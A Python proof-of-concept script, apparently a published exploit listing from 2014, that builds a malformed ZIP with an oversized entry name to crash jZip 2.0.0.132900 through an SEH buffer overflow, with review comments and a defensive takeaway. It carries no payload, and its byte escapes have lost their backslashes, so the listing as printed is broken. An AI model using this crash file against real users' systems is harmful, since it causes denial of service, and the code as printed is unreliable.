
Jzip 2.0.0.132900 Buffer Overflow

Posted on 18 April 2014

#!/usr/bin/python
######################################################
# Exploit title: seh unicode buffer overflow (DOS)
# Date: 16/04/2014
# Exploit Author: motaz reda [motazkhodair[at]gmail.com]
# Software Link : http://www.jzip.com/
# Version: jZip v2.0.0.132900
# Tested On: Windows 7 ultimate
########################################################
#
# Crash reproducer: writes "vuln.zip", a ZIP-shaped file whose single entry
# carries a very long file name. The name is written twice, once after each
# of the two header blobs below.
#
# NOTE(review): every "xNN" run below looks like a "\xNN" byte escape whose
# backslash was lost when this listing was published. As written they are
# plain ASCII text, so the file produced by this exact listing holds the
# characters "x50x4B..." rather than binary ZIP headers.
#
# NOTE(review): the NSEH/SEH slots hold only "x42" (the letter "B") filler,
# which agrees with the "(DOS)" label in the title: the sample demonstrates
# the crash and carries no further payload.
#
# Defensive takeaway: the trigger is an entry name thousands of bytes long.
# An archive handler should check the declared name length against its
# destination buffer before copying, and a scanner can flag archives whose
# entry names are far longer than any real path.

import os
import sys

filename = "vuln.zip"

# Presumably the ZIP local file header (intended signature bytes 50 4B 03 04).
# "xe4x0f" looks like a little-endian name length, 0x0fe4 = 4068 -- confirm.
local_header = "".join([
    "x50x4Bx03x04x14x00x00",
    "x00x00x00xB7xACxCEx34x00x00x00",
    "x00x00x00x00x00x00x00x00",
    "xe4x0f",
    "x00x00x00",
])

# Presumably the end-of-central-directory record (intended 50 4B 05 06).
end_of_central_dir = "".join([
    "x50x4Bx05x06x00x00x00x00x01x00x01x00",
    "x12x10x00x00",
    "x02x10x00x00",
    "x00x00",
])

# Presumably the central directory file header (intended 50 4B 01 02); it
# repeats the same "xe4x0f" value seen in the first blob.
central_dir_header = "".join([
    "x50x4Bx01x02x14x00x14",
    "x00x00x00x00x00xB7xACxCEx34x00x00x00",
    "x00x00x00x00x00x00x00x00x00",
    "xe4x0f",
    "x00x00x00x00x00x00x01x00",
    "x24x00x00x00x00x00x00x00",
])

# Oversized entry name. With the marker values read as two bytes each, the
# total is 862 + 2 + 2 + 3198 + 4 = 4068, matching the 0x0fe4 value above.
payload = "".join([
    "A" * 862,
    "x42x42",  # NSEH
    "x42x42",  # SEH
    "D" * 3198,
    ".txt",
])

# Layout: first header, name, central directory header, name again, end record.
archive_text = (
    local_header + payload + central_dir_header + payload + end_of_central_dir
)

# Text mode "w" is kept exactly as the original opened the file.
with open(filename, "w") as out:
    out.write(archive_text)

 
